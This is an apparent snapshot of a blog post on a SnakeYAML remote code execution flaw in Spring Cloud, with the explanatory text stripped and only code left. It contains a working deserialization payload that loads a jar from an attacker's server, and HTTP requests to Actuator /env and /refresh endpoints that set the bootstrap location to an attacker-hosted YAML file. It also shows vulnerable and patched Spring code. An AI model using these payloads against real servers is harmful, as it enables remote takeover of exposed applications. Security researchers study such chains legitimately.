添加链接 注册    登录
link管理
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接
相关文章推荐
含蓄的饭盒  ·  PHP模拟发送POST请求之五curl基本使 ...·  1 月前    · 
英姿勃勃的闹钟  ·  杭高国际部| 钱塘江畔逐浪_中美合作·  4 月前    · 
憨厚的硬盘  ·  MacOS Player settings ...·  6 月前    · 
朝气蓬勃的柿子  ·  listview 让指定item获得焦点 ...·  7 月前    · 
安静的电影票  ·  .net Task开启异步任务处理大数据 ...·  9 月前    · 
傻傻的南瓜  ·  使用阈值调优改进分类模型性能_腾讯新闻·  1 年前    · 
link管理  ›  SpringCloud-SnakeYAML-RCE
post请求
https://y4tacker.github.io/2022/02/08/year/2022/2/SpringCloud-SnakeYAML-RCE/
重感情的面包
10 月前 

1
2
3
4
5
 
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/example.jar"]
  ]]
]
 

1
2
3
4
 
POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/example.yml
 

1
2
3
4
 
POST /actuator/env
Content-Type: application/json

{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/example.yml"}
 

1
2
 
POST /refresh
Content-Type: application/x-www-form-urlencoded
 

1
2
 
POST /actuator/refresh
Content-Type: application/json
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
 
private StandardEnvironment copyEnvironment(ConfigurableEnvironment input) {
       StandardEnvironment environment = new StandardEnvironment();
       MutablePropertySources capturedPropertySources = environment.getPropertySources();
       Iterator var4 = capturedPropertySources.iterator();

       PropertySource source;
       while(var4.hasNext()) {
           source = (PropertySource)var4.next();
           capturedPropertySources.remove(source.getName());
       }

       var4 = input.getPropertySources().iterator();

       while(var4.hasNext()) {
           source = (PropertySource)var4.next();
           capturedPropertySources.addLast(source);
       }

       environment.setActiveProfiles(input.getActiveProfiles());
       environment.setDefaultProfiles(input.getDefaultProfiles());
       Map<String, Object> map = new HashMap();
       map.put("spring.jmx.enabled", false);
       map.put("spring.main.sources", "");
       capturedPropertySources.addFirst(new MapPropertySource("refreshArgs", map));
       return environment;
   }
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
 
private StandardEnvironment copyEnvironment(ConfigurableEnvironment input) {
        StandardEnvironment environment = new StandardEnvironment();
        MutablePropertySources capturedPropertySources = environment.getPropertySources();
        String[] var4 = DEFAULT_PROPERTY_SOURCES;
        int var5 = var4.length;

        for(int var6 = 0; var6 < var5; ++var6) {
            String name = var4[var6];
            if (input.getPropertySources().contains(name)) {
                if (capturedPropertySources.contains(name)) {
                    capturedPropertySources.replace(name, input.getPropertySources().get(name));
                } else {
                    capturedPropertySources.addLast(input.getPropertySources().get(name));
                }
            }
        }

        environment.setActiveProfiles(input.getActiveProfiles());
        environment.setDefaultProfiles(input.getDefaultProfiles());
        Map<String, Object> map = new HashMap();
        map.put("spring.jmx.enabled", false);
        map.put("spring.main.sources", "");
        map.put("spring.main.web-application-type", "NONE");
        capturedPropertySources.addFirst(new MapPropertySource("refreshArgs", map));
        return environment;
    }
 

1
 
private static final String[] DEFAULT_PROPERTY_SOURCES = new String[]{"commandLineArgs", "defaultProperties"};

 
推荐文章
含蓄的饭盒  ·  PHP模拟发送POST请求之五curl基本使用和多线程优化 - 枕边书
1 月前
英姿勃勃的闹钟  ·  杭高国际部| 钱塘江畔逐浪_中美合作
4 月前
憨厚的硬盘  ·  MacOS Player settings - Unity 手册
6 月前
朝气蓬勃的柿子  ·  listview 让指定item获得焦点 listview点击获取文本_mob64ca140651e5的技术博客_51CTO博客
7 月前
安静的电影票  ·  .net Task开启异步任务处理大数据 - CSDN文库
9 月前
傻傻的南瓜  ·  使用阈值调优改进分类模型性能_腾讯新闻
1 年前
Link管理   ·   51好读   ·   Sov5搜索   ·   小百科
link管理 - 链接快照平台